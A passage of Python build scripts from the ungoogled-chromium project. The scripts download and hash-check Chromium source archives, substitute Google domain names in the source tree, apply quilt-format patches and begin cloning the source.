percentage = round(block_count / total_blocks, ndigits=3) if percentage == self._last_percentage: return self._last_percentage = percentage print('\r' + ' ' * self._max_len_printed, end='') status_line = 'Progress: {:.1%} of {:,d} B'.format(percentage, total_size) else: downloaded_estimate = block_count * block_size status_line = 'Progress: {:,d} B of unknown size'.format(downloaded_estimate) self._max_len_printed = len(status_line) print('\r' + status_line, end='') def _download_via_urllib(url, file_path, show_progress, disable_ssl_verification): reporthook = None if show_progress: reporthook = _UrlRetrieveReportHook() if disable_ssl_verification: # TODO: Remove this or properly implement disabling SSL certificate verification orig_https_context = ssl._create_default_https_context #pylint: disable=protected-access ssl._create_default_https_context = ssl._create_unverified_context #pylint: disable=protected-access try: urllib.request.urlretrieve(url, str(file_path), reporthook=reporthook) finally: # Try to reduce damage of hack by reverting original HTTPS context ASAP if disable_ssl_verification: ssl._create_default_https_context = orig_https_context #pylint: disable=protected-access if show_progress: print() def _download_if_needed(file_path, url, show_progress, disable_ssl_verification): """ Downloads a file from url to the specified path file_path if necessary. If show_progress is True, download progress is printed to the console. """ if file_path.exists(): get_logger().info('%s already exists. Skipping download.', file_path) return # File name for partially download file tmp_file_path = file_path.with_name(file_path.name + '.partial') if tmp_file_path.exists(): get_logger().debug('Resuming downloading URL %s ...', url) else: get_logger().debug('Downloading URL %s ...', url) # Perform download if shutil.which('curl'): get_logger().debug('Using curl') try: subprocess.run(['curl', '-fL', '-o', str(tmp_file_path), '-C', '-', url], check=True) except subprocess.CalledProcessError as exc: get_logger().error('curl failed. Re-run the download command to resume downloading.') raise exc else: get_logger().debug('Using urllib') _download_via_urllib(url, tmp_file_path, show_progress, disable_ssl_verification) # Download complete; rename file tmp_file_path.rename(file_path) def _chromium_hashes_generator(hashes_path): with hashes_path.open(encoding=ENCODING) as hashes_file: hash_lines = hashes_file.read().splitlines() for hash_name, hash_hex, _ in map(lambda x: x.lower().split(' '), hash_lines): if hash_name in hashlib.algorithms_available: yield hash_name, hash_hex else: get_logger().warning('Skipping unknown hash algorithm: %s', hash_name) def _get_hash_pairs(download_properties, cache_dir): """Generator of (hash_name, hash_hex) for the given download""" for entry_type, entry_value in download_properties.hashes.items(): if entry_type == 'hash_url': hash_processor, hash_filename, _ = entry_value if hash_processor == 'chromium': yield from _chromium_hashes_generator(cache_dir / hash_filename) else: raise ValueError('Unknown hash_url processor: %s' % hash_processor) else: yield entry_type, entry_value def retrieve_downloads(download_info, cache_dir, show_progress, disable_ssl_verification=False): """ Retrieve downloads into the downloads cache. download_info is the DowloadInfo of downloads to retrieve. cache_dir is the pathlib.Path to the downloads cache. show_progress is a boolean indicating if download progress is printed to the console. 
disable_ssl_verification is a boolean indicating if certificate verification should be disabled for downloads using HTTPS. Raises FileNotFoundError if the downloads path does not exist. Raises NotADirectoryError if the downloads path is not a directory. """ if not cache_dir.exists(): raise FileNotFoundError(cache_dir) if not cache_dir.is_dir(): raise NotADirectoryError(cache_dir) for download_name, download_properties in download_info.properties_iter(): get_logger().info('Downloading "%s" to "%s" ...', download_name, download_properties.download_filename) download_path = cache_dir / download_properties.download_filename _download_if_needed(download_path, download_properties.url, show_progress, disable_ssl_verification) if download_properties.has_hash_url(): get_logger().info('Downloading hashes for "%s"', download_name) _, hash_filename, hash_url = download_properties.hashes['hash_url'] _download_if_needed(cache_dir / hash_filename, hash_url, show_progress, disable_ssl_verification) def check_downloads(download_info, cache_dir): """ Check integrity of the downloads cache. download_info is the DownloadInfo of downloads to unpack. cache_dir is the pathlib.Path to the downloads cache. Raises source_retrieval.HashMismatchError when the computed and expected hashes do not match. """ for download_name, download_properties in download_info.properties_iter(): get_logger().info('Verifying hashes for "%s" ...', download_name) download_path = cache_dir / download_properties.download_filename with download_path.open('rb') as file_obj: archive_data = file_obj.read() for hash_name, hash_hex in _get_hash_pairs(download_properties, cache_dir): get_logger().debug('Verifying %s hash...', hash_name) hasher = hashlib.new(hash_name, data=archive_data) if not hasher.hexdigest().lower() == hash_hex.lower(): raise HashMismatchError(download_path) def unpack_downloads(download_info, cache_dir, output_dir, skip_unused, sysroot, extractors=None): """ Unpack downloads in the downloads cache to output_dir. Assumes all downloads are retrieved. download_info is the DownloadInfo of downloads to unpack. cache_dir is the pathlib.Path directory containing the download cache output_dir is the pathlib.Path directory to unpack the downloads to. skip_unused is a boolean that determines if unused paths should be extracted. sysroot is a string containing a sysroot to unpack if any. extractors is a dictionary of PlatformEnum to a command or path to the extractor binary. Defaults to 'tar' for tar, and '_use_registry' for 7-Zip and WinRAR. May raise undetermined exceptions during archive unpacking. 
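    Raises NotImplementedError if a download specifies an extractor other than
    ExtractorEnum.TAR, ExtractorEnum.SEVENZIP, or ExtractorEnum.WINRAR.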
""" for download_name, download_properties in download_info.properties_iter(): download_path = cache_dir / download_properties.download_filename get_logger().info('Unpacking "%s" to %s ...', download_name, download_properties.output_path) extractor_name = download_properties.extractor or ExtractorEnum.TAR if extractor_name == ExtractorEnum.SEVENZIP: extractor_func = extract_with_7z elif extractor_name == ExtractorEnum.WINRAR: extractor_func = extract_with_winrar elif extractor_name == ExtractorEnum.TAR: extractor_func = extract_tar_file else: raise NotImplementedError(extractor_name) if download_properties.strip_leading_dirs is None: strip_leading_dirs_path = None else: strip_leading_dirs_path = Path(download_properties.strip_leading_dirs) extractor_func(archive_path=download_path, output_dir=output_dir / Path(download_properties.output_path), relative_to=strip_leading_dirs_path, skip_unused=skip_unused, sysroot=sysroot, extractors=extractors) def _add_common_args(parser): parser.add_argument( '-i', '--ini', type=Path, nargs='+', help='The downloads INI to parse for downloads. Can be specified multiple times.') parser.add_argument('-c', '--cache', type=Path, required=True, help='Path to the directory to cache downloads.') def _retrieve_callback(args): retrieve_downloads(DownloadInfo(args.ini), args.cache, args.show_progress, args.disable_ssl_verification) try: check_downloads(DownloadInfo(args.ini), args.cache) except HashMismatchError as exc: get_logger().error('File checksum does not match: %s', exc) sys.exit(1) def _unpack_callback(args): extractors = { ExtractorEnum.SEVENZIP: args.sevenz_path, ExtractorEnum.WINRAR: args.winrar_path, ExtractorEnum.TAR: args.tar_path, } unpack_downloads(DownloadInfo(args.ini), args.cache, args.output, args.skip_unused, args.sysroot, extractors) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser(description=__doc__) add_common_params(parser) subparsers = parser.add_subparsers(title='Download actions', dest='action') # retrieve retrieve_parser = subparsers.add_parser( 'retrieve', help='Retrieve and check download files', description=('Retrieves and checks downloads without unpacking. ' 'The downloader will attempt to use CLI command "curl". ' 'If it is not present, Python\'s urllib will be used. However, only ' 'the CLI-based downloaders can be resumed if the download is aborted.')) _add_common_args(retrieve_parser) retrieve_parser.add_argument('--hide-progress-bar', action='store_false', dest='show_progress', help='Hide the download progress.') retrieve_parser.add_argument( '--disable-ssl-verification', action='store_true', help='Disables certification verification for downloads using HTTPS.') retrieve_parser.set_defaults(callback=_retrieve_callback) # unpack unpack_parser = subparsers.add_parser( 'unpack', help='Unpack download files', description='Verifies hashes of and unpacks download files into the specified directory.') _add_common_args(unpack_parser) unpack_parser.add_argument('--tar-path', default='tar', help=('(Linux and macOS only) Command or path to the BSD or GNU tar ' 'binary for extraction. Default: %(default)s')) unpack_parser.add_argument( '--7z-path', dest='sevenz_path', default=USE_REGISTRY, help=('Command or path to 7-Zip\'s "7z" binary. If "_use_registry" is ' 'specified, determine the path from the registry. Default: %(default)s')) unpack_parser.add_argument( '--winrar-path', dest='winrar_path', default=USE_REGISTRY, help=('Command or path to WinRAR\'s "winrar" binary. 
If "_use_registry" is ' 'specified, determine the path from the registry. Default: %(default)s')) unpack_parser.add_argument('output', type=Path, help='The directory to unpack to.') unpack_parser.add_argument('--skip-unused', action='store_true', help='Skip extraction of unused directories (CONTINGENT_PATHS).') unpack_parser.add_argument('--sysroot', choices=('amd64', 'i386'), help=('Extracts the sysroot for the given architecture ' 'when --skip-unused is set.')) unpack_parser.set_defaults(callback=_unpack_callback) args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/domain_substitution.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Substitute domain names in the source tree with blockable strings. """ from pathlib import Path import argparse import collections import contextlib import io import os import stat import re import tarfile import tempfile import zlib from _extraction import extract_tar_file from _common import ENCODING, get_logger, add_common_params # Encodings to try on source tree files TREE_ENCODINGS = ('UTF-8', 'ISO-8859-1') # Constants for domain substitution cache _INDEX_LIST = 'cache_index.list' _INDEX_HASH_DELIMITER = '|' _ORIG_DIR = 'orig' # Constants for timestamp manipulation # Delta between all file timestamps in nanoseconds _TIMESTAMP_DELTA = 1 * 10**9 class DomainRegexList: """Representation of a domain_regex.list file""" _regex_pair_tuple = collections.namedtuple('DomainRegexPair', ('pattern', 'replacement')) # Constants for format: _PATTERN_REPLACE_DELIM = '#' def __init__(self, path): self._data = tuple(filter(len, path.read_text().splitlines())) # Cache of compiled regex pairs self._compiled_regex = None def _compile_regex(self, line): """Generates a regex pair tuple for the given line""" pattern, replacement = line.split(self._PATTERN_REPLACE_DELIM) return self._regex_pair_tuple(re.compile(pattern), replacement) @property def regex_pairs(self): """ Returns a tuple of compiled regex pairs """ if not self._compiled_regex: self._compiled_regex = tuple(map(self._compile_regex, self._data)) return self._compiled_regex @property def search_regex(self): """ Returns a single expression to search for domains """ return re.compile('|'.join( map(lambda x: x.split(self._PATTERN_REPLACE_DELIM, 1)[0], self._data))) # Private Methods def _substitute_path(path, regex_iter): """ Perform domain substitution on path and add it to the domain substitution cache. path is a pathlib.Path to the file to be domain substituted. regex_iter is an iterable of regular expression namedtuple like from config.DomainRegexList.regex_pairs() Returns a tuple of the CRC32 hash of the substituted raw content and the original raw content; None for both entries if no substitutions were made. Raises FileNotFoundError if path does not exist. Raises UnicodeDecodeError if path's contents cannot be decoded. """ if not os.access(path, os.W_OK): # If the patch cannot be written to, it cannot be opened for updating print(str(path) + " cannot be opened for writing! 
Adding write permission...") path.chmod(path.stat().st_mode | stat.S_IWUSR) with path.open('r+b') as input_file: original_content = input_file.read() if not original_content: return (None, None) content = None encoding = None for encoding in TREE_ENCODINGS: try: content = original_content.decode(encoding) break except UnicodeDecodeError: continue if not content: raise UnicodeDecodeError('Unable to decode with any encoding: %s' % path) file_subs = 0 for regex_pair in regex_iter: content, sub_count = regex_pair.pattern.subn(regex_pair.replacement, content) file_subs += sub_count if file_subs > 0: substituted_content = content.encode(encoding) input_file.seek(0) input_file.write(content.encode(encoding)) input_file.truncate() return (zlib.crc32(substituted_content), original_content) return (None, None) def _validate_file_index(index_file, resolved_tree, cache_index_files): """ Validation of file index and hashes against the source tree. Updates cache_index_files Returns True if the file index is valid; False otherwise """ all_hashes_valid = True crc32_regex = re.compile(r'^[a-zA-Z0-9]{8}$') for entry in index_file.read().decode(ENCODING).splitlines(): try: relative_path, file_hash = entry.split(_INDEX_HASH_DELIMITER) except ValueError as exc: get_logger().error('Could not split entry "%s": %s', entry, exc) continue if not relative_path or not file_hash: get_logger().error('Entry %s of domain substitution cache file index is not valid', _INDEX_HASH_DELIMITER.join((relative_path, file_hash))) all_hashes_valid = False continue if not crc32_regex.match(file_hash): get_logger().error('File index hash for %s does not appear to be a CRC32 hash', relative_path) all_hashes_valid = False continue if zlib.crc32((resolved_tree / relative_path).read_bytes()) != int(file_hash, 16): get_logger().error('Hashes do not match for: %s', relative_path) all_hashes_valid = False continue if relative_path in cache_index_files: get_logger().error('File %s shows up at least twice in the file index', relative_path) all_hashes_valid = False continue cache_index_files.add(relative_path) return all_hashes_valid @contextlib.contextmanager def _update_timestamp(path: os.PathLike, set_new: bool) -> None: """ Context manager to set the timestamp of the path to plus or minus a fixed delta, regardless of modifications within the context. if set_new is True, the delta is added. Otherwise, the delta is subtracted. """ stats = os.stat(path) if set_new: new_timestamp = (stats.st_atime_ns + _TIMESTAMP_DELTA, stats.st_mtime_ns + _TIMESTAMP_DELTA) else: new_timestamp = (stats.st_atime_ns - _TIMESTAMP_DELTA, stats.st_mtime_ns - _TIMESTAMP_DELTA) try: yield finally: os.utime(path, ns=new_timestamp) # Public Methods def apply_substitution(regex_path, files_path, source_tree, domainsub_cache): """ Substitute domains in source_tree with files and substitutions, and save the pre-domain substitution archive to presubdom_archive. regex_path is a pathlib.Path to domain_regex.list files_path is a pathlib.Path to domain_substitution.list source_tree is a pathlib.Path to the source tree. domainsub_cache is a pathlib.Path to the domain substitution cache. Raises NotADirectoryError if the patches directory is not a directory or does not exist Raises FileNotFoundError if the source tree or required directory does not exist. Raises FileExistsError if the domain substitution cache already exists. Raises ValueError if an entry in the domain substitution list contains the file index hash delimiter. 
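
    Example (an illustrative sketch; the build/ paths are hypothetical):

        apply_substitution(Path('domain_regex.list'), Path('domain_substitution.list'),
                           Path('build/src'), Path('build/domsubcache.tar.gz'))

    The cache file's suffix selects the tarfile compression mode (here 'w:gz'), and the
    cache path must not already exist.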
""" if not source_tree.exists(): raise FileNotFoundError(source_tree) if not regex_path.exists(): raise FileNotFoundError(regex_path) if not files_path.exists(): raise FileNotFoundError(files_path) if domainsub_cache and domainsub_cache.exists(): raise FileExistsError(domainsub_cache) resolved_tree = source_tree.resolve() regex_pairs = DomainRegexList(regex_path).regex_pairs fileindex_content = io.BytesIO() with tarfile.open(str(domainsub_cache), 'w:%s' % domainsub_cache.suffix[1:], compresslevel=1) if domainsub_cache else open(os.devnull, 'w') as cache_tar: for relative_path in filter(len, files_path.read_text().splitlines()): if _INDEX_HASH_DELIMITER in relative_path: if domainsub_cache: # Cache tar will be incomplete; remove it for convenience cache_tar.close() domainsub_cache.unlink() raise ValueError( 'Path "%s" contains the file index hash delimiter "%s"' % relative_path, _INDEX_HASH_DELIMITER) path = resolved_tree / relative_path if not path.exists(): get_logger().warning('Skipping non-existant path: %s', path) continue if path.is_symlink(): get_logger().warning('Skipping path that has become a symlink: %s', path) continue with _update_timestamp(path, set_new=True): crc32_hash, orig_content = _substitute_path(path, regex_pairs) if crc32_hash is None: get_logger().info('Path has no substitutions: %s', relative_path) continue if domainsub_cache: fileindex_content.write('{}{}{:08x}\n'.format(relative_path, _INDEX_HASH_DELIMITER, crc32_hash).encode(ENCODING)) orig_tarinfo = tarfile.TarInfo(str(Path(_ORIG_DIR) / relative_path)) orig_tarinfo.size = len(orig_content) with io.BytesIO(orig_content) as orig_file: cache_tar.addfile(orig_tarinfo, orig_file) if domainsub_cache: fileindex_tarinfo = tarfile.TarInfo(_INDEX_LIST) fileindex_tarinfo.size = fileindex_content.tell() fileindex_content.seek(0) cache_tar.addfile(fileindex_tarinfo, fileindex_content) def revert_substitution(domainsub_cache, source_tree): """ Revert domain substitution on source_tree using the pre-domain substitution archive presubdom_archive. It first checks if the hashes of the substituted files match the hashes computed during the creation of the domain substitution cache, raising KeyError if there are any mismatches. Then, it proceeds to reverting files in the source_tree. domainsub_cache is removed only if all the files from the domain substitution cache were relocated to the source tree. domainsub_cache is a pathlib.Path to the domain substitution cache. source_tree is a pathlib.Path to the source tree. Raises KeyError if: * There is a hash mismatch while validating the cache * The cache's file index is corrupt or missing * The cache is corrupt or is not consistent with the file index Raises FileNotFoundError if the source tree or domain substitution cache do not exist. """ # This implementation trades disk space/wear for performance (unless a ramdisk is used # for the source tree) # Assumptions made for this process: # * The correct tar file was provided (so no huge amount of space is wasted) # * The tar file is well-behaved (e.g. no files extracted outside of destination path) # * Cache file index and cache contents are already consistent (i.e. 
no files exclusive to # one or the other) if not domainsub_cache: get_logger().error('Cache file must be specified.') if not domainsub_cache.exists(): raise FileNotFoundError(domainsub_cache) if not source_tree.exists(): raise FileNotFoundError(source_tree) resolved_tree = source_tree.resolve() cache_index_files = set() # All files in the file index with tempfile.TemporaryDirectory(prefix='domsubcache_files', dir=str(resolved_tree)) as tmp_extract_name: extract_path = Path(tmp_extract_name) get_logger().debug('Extracting domain substitution cache...') extract_tar_file(domainsub_cache, extract_path, None, False, None) # Validate source tree file hashes match get_logger().debug('Validating substituted files in source tree...') with (extract_path / _INDEX_LIST).open('rb') as index_file: #pylint: disable=no-member if not _validate_file_index(index_file, resolved_tree, cache_index_files): raise KeyError('Domain substitution cache file index is corrupt or hashes mismatch ' 'the source tree.') # Move original files over substituted ones get_logger().debug('Moving original files over substituted ones...') for relative_path in cache_index_files: with _update_timestamp(resolved_tree / relative_path, set_new=False): (extract_path / _ORIG_DIR / relative_path).replace(resolved_tree / relative_path) # Quick check for unused files in cache orig_has_unused = False for orig_path in (extract_path / _ORIG_DIR).rglob('*'): #pylint: disable=no-member if orig_path.is_file(): get_logger().warning('Unused file from cache: %s', orig_path) orig_has_unused = True if orig_has_unused: get_logger().warning('Cache contains unused files. Not removing.') else: domainsub_cache.unlink() def _callback(args): """CLI Callback""" if args.reverting: revert_substitution(args.cache, args.directory) else: apply_substitution(args.regex, args.files, args.directory, args.cache) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() add_common_params(parser) parser.set_defaults(callback=_callback) subparsers = parser.add_subparsers(title='', dest='packaging') # apply apply_parser = subparsers.add_parser( 'apply', help='Apply domain substitution', description='Applies domain substitution and creates the domain substitution cache.') apply_parser.add_argument('-r', '--regex', type=Path, required=True, help='Path to domain_regex.list') apply_parser.add_argument('-f', '--files', type=Path, required=True, help='Path to domain_substitution.list') apply_parser.add_argument( '-c', '--cache', type=Path, help='The path to the domain substitution cache. The path must not already exist.') apply_parser.add_argument('directory', type=Path, help='The directory to apply domain substitution') apply_parser.set_defaults(reverting=False) # revert revert_parser = subparsers.add_parser( 'revert', help='Revert domain substitution', description='Reverts domain substitution based only on the domain substitution cache.') revert_parser.add_argument('directory', type=Path, help='The directory to reverse domain substitution') revert_parser.add_argument('-c', '--cache', type=Path, required=True, help=('The path to the domain substitution cache. ' 'The path must exist and will be removed if successful.')) revert_parser.set_defaults(reverting=True) args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/patches.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2020 The ungoogled-chromium Authors. All rights reserved. 
# Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Applies unified diff patches""" import argparse import os import shutil import subprocess from pathlib import Path from _common import get_logger, parse_series, add_common_params def _find_patch_from_env(): patch_bin_path = None patch_bin_env = os.environ.get('PATCH_BIN') if patch_bin_env: patch_bin_path = Path(patch_bin_env) if patch_bin_path.exists(): get_logger().debug('Found PATCH_BIN with path "%s"', patch_bin_path) else: patch_which = shutil.which(patch_bin_env) if patch_which: get_logger().debug('Found PATCH_BIN for command with path "%s"', patch_which) patch_bin_path = Path(patch_which) else: get_logger().debug('PATCH_BIN env variable is not set') return patch_bin_path def _find_patch_from_which(): patch_which = shutil.which('patch') if not patch_which: get_logger().debug('Did not find "patch" in PATH environment variable') return None return Path(patch_which) def find_and_check_patch(patch_bin_path=None): """ Find and/or check the patch binary is working. It finds a path to patch in this order: 1. Use patch_bin_path if it is not None 2. See if "PATCH_BIN" environment variable is set 3. Do "which patch" to find GNU patch Then it does some sanity checks to see if the patch command is valid. Returns the path to the patch binary found. """ if patch_bin_path is None: patch_bin_path = _find_patch_from_env() if patch_bin_path is None: patch_bin_path = _find_patch_from_which() if not patch_bin_path: raise ValueError('Could not find patch from PATCH_BIN env var or "which patch"') if not patch_bin_path.exists(): raise ValueError('Could not find the patch binary: {}'.format(patch_bin_path)) # Ensure patch actually runs cmd = [str(patch_bin_path), '--version'] result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False, universal_newlines=True) if result.returncode: get_logger().error('"%s" returned non-zero exit code', ' '.join(cmd)) get_logger().error('stdout:\n%s', result.stdout) get_logger().error('stderr:\n%s', result.stderr) raise RuntimeError('Got non-zero exit code running "{}"'.format(' '.join(cmd))) return patch_bin_path def dry_run_check(patch_path, tree_path, patch_bin_path=None): """ Run patch --dry-run on a patch tree_path is the pathlib.Path of the source tree to patch patch_path is a pathlib.Path to check reverse is whether the patches should be reversed patch_bin_path is the pathlib.Path of the patch binary, or None to find it automatically See find_and_check_patch() for logic to find "patch" Returns the status code, stdout, and stderr of patch --dry-run """ cmd = [ str(find_and_check_patch(patch_bin_path)), '-p1', '--ignore-whitespace', '-i', str(patch_path), '-d', str(tree_path), '--no-backup-if-mismatch', '--dry-run' ] result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False, universal_newlines=True) return result.returncode, result.stdout, result.stderr def apply_patches(patch_path_iter, tree_path, reverse=False, patch_bin_path=None): """ Applies or reverses a list of patches tree_path is the pathlib.Path of the source tree to patch patch_path_iter is a list or tuple of pathlib.Path to patch files to apply reverse is whether the patches should be reversed patch_bin_path is the pathlib.Path of the patch binary, or None to find it automatically See find_and_check_patch() for logic to find "patch" Raises ValueError if the patch binary could not be found. 
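
    Example (an illustrative sketch; the patches directory and source tree paths are
    hypothetical):

        series_iter = generate_patches_from_series(Path('patches'), resolve=True)
        apply_patches(series_iter, Path('build/src'))

    Passing reverse=True backs the patches out again; the series order is reversed
    automatically in that case.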
""" patch_paths = list(patch_path_iter) patch_bin_path = find_and_check_patch(patch_bin_path=patch_bin_path) if reverse: patch_paths.reverse() logger = get_logger() for patch_path, patch_num in zip(patch_paths, range(1, len(patch_paths) + 1)): cmd = [ str(patch_bin_path), '-p1', '--ignore-whitespace', '-i', str(patch_path), '-d', str(tree_path), '--no-backup-if-mismatch' ] if reverse: cmd.append('--reverse') log_word = 'Reversing' else: cmd.append('--forward') log_word = 'Applying' logger.info('* %s %s (%s/%s)', log_word, patch_path.name, patch_num, len(patch_paths)) logger.debug(' '.join(cmd)) subprocess.run(cmd, check=True) def generate_patches_from_series(patches_dir, resolve=False): """Generates pathlib.Path for patches from a directory in GNU Quilt format""" for patch_path in parse_series(patches_dir / 'series'): if resolve: yield (patches_dir / patch_path).resolve() else: yield patch_path def _copy_files(path_iter, source, destination): """Copy files from source to destination with relative paths from path_iter""" for path in path_iter: (destination / path).parent.mkdir(parents=True, exist_ok=True) shutil.copy2(str(source / path), str(destination / path)) def merge_patches(source_iter, destination, prepend=False): """ Merges GNU quilt-formatted patches directories from sources into destination destination must not already exist, unless prepend is True. If prepend is True, then the source patches will be prepended to the destination. """ series = [] known_paths = set() if destination.exists(): if prepend: if not (destination / 'series').exists(): raise FileNotFoundError( 'Could not find series file in existing destination: {}'.format(destination / 'series')) known_paths.update(generate_patches_from_series(destination)) else: raise FileExistsError('destination already exists: {}'.format(destination)) for source_dir in source_iter: patch_paths = tuple(generate_patches_from_series(source_dir)) patch_intersection = known_paths.intersection(patch_paths) if patch_intersection: raise FileExistsError( 'Patches from {} have conflicting paths with other sources: {}'.format( source_dir, patch_intersection)) series.extend(patch_paths) _copy_files(patch_paths, source_dir, destination) if prepend and (destination / 'series').exists(): series.extend(generate_patches_from_series(destination)) with (destination / 'series').open('w') as series_file: series_file.write('\n'.join(map(str, series))) def _apply_callback(args, parser_error): logger = get_logger() patch_bin_path = None if args.patch_bin is not None: patch_bin_path = Path(args.patch_bin) if not patch_bin_path.exists(): patch_bin_path = shutil.which(args.patch_bin) if patch_bin_path: patch_bin_path = Path(patch_bin_path) else: parser_error( f'--patch-bin "{args.patch_bin}" is not a command or path to executable.') for patch_dir in args.patches: logger.info('Applying patches from %s', patch_dir) apply_patches(generate_patches_from_series(patch_dir, resolve=True), args.target, patch_bin_path=patch_bin_path) def _merge_callback(args, _): merge_patches(args.source, args.destination, args.prepend) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() add_common_params(parser) subparsers = parser.add_subparsers() apply_parser = subparsers.add_parser( 'apply', help='Applies patches (in GNU Quilt format) to the specified source tree') apply_parser.add_argument('--patch-bin', help='The GNU patch command to use. 
Omit to find it automatically.') apply_parser.add_argument('target', type=Path, help='The directory tree to apply patches onto.') apply_parser.add_argument( 'patches', type=Path, nargs='+', help='The directories containing patches to apply. They must be in GNU quilt format') apply_parser.set_defaults(callback=_apply_callback) merge_parser = subparsers.add_parser('merge', help='Merges patches directories in GNU quilt format') merge_parser.add_argument( '--prepend', '-p', action='store_true', help=('If "destination" exists, prepend patches from sources into it.' ' By default, merging will fail if the destination already exists.')) merge_parser.add_argument( 'destination', type=Path, help=('The directory to write the merged patches to. ' 'The destination must not exist unless --prepend is specified.')) merge_parser.add_argument('source', type=Path, nargs='+', help='The GNU quilt patches to merge.') merge_parser.set_defaults(callback=_merge_callback) args = parser.parse_args() if 'callback' not in args: parser.error('Must specify subcommand apply or merge') args.callback(args, parser.error) if __name__ == '__main__': main() File: utils/make_domsub_script.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2023 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Generate standalone script that performs the domain substitution. """ from pathlib import Path import argparse import re def make_domain_substitution_script(regex_path, files_path, output_path): """ Generate a standalone shell script (which uses Perl) that performs domain substitution on the appropriate files. regex_path is a pathlib.Path to domain_regex.list files_path is a pathlib.Path to domain_substitution.list output_path is a pathlib.Path to the output file. Raises FileNotFoundError if the regex or file lists do not exist. Raises FileExistsError if the output file already exists. """ if not regex_path.exists(): raise FileNotFoundError(regex_path) if not files_path.exists(): raise FileNotFoundError(files_path) if output_path.exists(): raise FileExistsError(output_path) regex_list = tuple(filter(len, regex_path.read_text().splitlines())) files_list = tuple(filter(len, files_path.read_text().splitlines())) # Convert the Python-style regexes into a Perl s/// op perl_replace_list = ['s#' + re.sub(r'\\g<(\d+)>', r'${\1}', x) + '#g' for x in regex_list] files_list_str = '\n'.join(files_list) perl_replace_list_str = '\n'.join([f' {x};' for x in perl_replace_list]) with open(output_path, 'w') as out: out.write("""#!/bin/sh -e # # This script performs domain substitution on the Chromium source files. # # Generated by make_domsub_script.py, part of the ungoogled-chromium project: # https://github.com/ungoogled-software/ungoogled-chromium.git # # Check that we are inside the Chromium source tree test -f build/config/compiler/BUILD.gn # These filenames may contain spaces and/or other unusual characters print_file_list() { cat <<'__END__' %s __END__ } echo "Creating backup archive ..." backup=domain-substitution.orig.tar print_file_list | tar cf $backup --verbatim-files-from --files-from=- echo "Applying ungoogled-chromium domain substitution to %d files ..." 
print_file_list | xargs -d '\\n' perl -0777 -C0 -pwi -e ' %s ' # end """ % (files_list_str, len(files_list), perl_replace_list_str)) def _callback(args): """CLI Callback""" make_domain_substitution_script(args.regex, args.files, args.output) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() parser.set_defaults(callback=_callback) parser.add_argument('-r', '--regex', type=Path, required=True, help='Path to domain_regex.list') parser.add_argument('-f', '--files', type=Path, required=True, help='Path to domain_substitution.list') parser.add_argument('-o', '--output', type=Path, required=True, help='Path to script file to create') args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/clone.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2023 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Module for cloning the source tree. """ import re import sys from argparse import ArgumentParser from os import environ, pathsep from pathlib import Path from shutil import copytree, copy, move from stat import S_IWRITE from subprocess import run from _common import add_common_params, get_chromium_version, get_logger from prune_binaries import CONTINGENT_PATHS # Config file for gclient # Instances of 'src' replaced with UC_OUT, which will be replaced with the output directory # custom_deps are set to None since they are large and unused # target_* arguments set to match tarball rather than actual build target GC_CONFIG = """\ solutions = [ { "name": "UC_OUT", "url": "https://chromium.googlesource.com/chromium/src.git", "managed": False, "custom_deps": { "UC_OUT/third_party/angle/third_party/VK-GL-CTS/src": None, "UC_OUT/third_party/instrumented_libs": None, }, "custom_vars": { "checkout_configuration": "small", "non_git_source": "False", }, }, ]; target_os = ['unix']; target_os_only = True; target_cpu = ['x64']; target_cpu_only = True; """ def clone(args): # pylint: disable=too-many-branches, too-many-statements """Clones, downloads, and generates the required sources""" get_logger().info('Setting up cloning environment') iswin = sys.platform.startswith('win') chromium_version = get_chromium_version() ucstaging = args.output / 'uc_staging' dtpath = ucstaging / 'depot_tools' gnpath = ucstaging / 'gn' environ['GCLIENT_FILE'] = str(ucstaging / '.gclient') environ['PATH'] += pathsep + str(dtpath) environ['PYTHONPATH'] = str(dtpath) # Prevent gclient from auto updating depot_tools environ['DEPOT_TOOLS_UPDATE'] = '0' # Don't generate pycache files environ['PYTHONDONTWRITEBYTECODE'] = '1' # Allow usage of system python environ['VPYTHON_BYPASS'] = 'manually managed python not supported by chrome operations' # Google has some regex strings that aren't escaped properly or set as raw environ["PYTHONWARNINGS"] = "ignore::SyntaxWarning" # depth=2 since generating LASTCHANGE and gpu_lists_version.h require at least two commits get_logger().info('Cloning chromium source: %s', chromium_version) if (args.output / '.git').exists(): run(['git', 'fetch', 'origin', 'tag', chromium_version, '--depth=2'], cwd=args.output, check=True) run(['git', 'reset', '--hard', 'FETCH_HEAD'], cwd=args.output, check=True) run(['git', 'clean', '-ffdx', '-e', 'uc_staging'], cwd=args.output, check=True) else: run([ 'git', 'clone', '-c', 'advice.detachedHead=false', '-b', chromium_version, '--depth=2', "https://chromium.googlesource.com/chromium/src", str(args.output) 
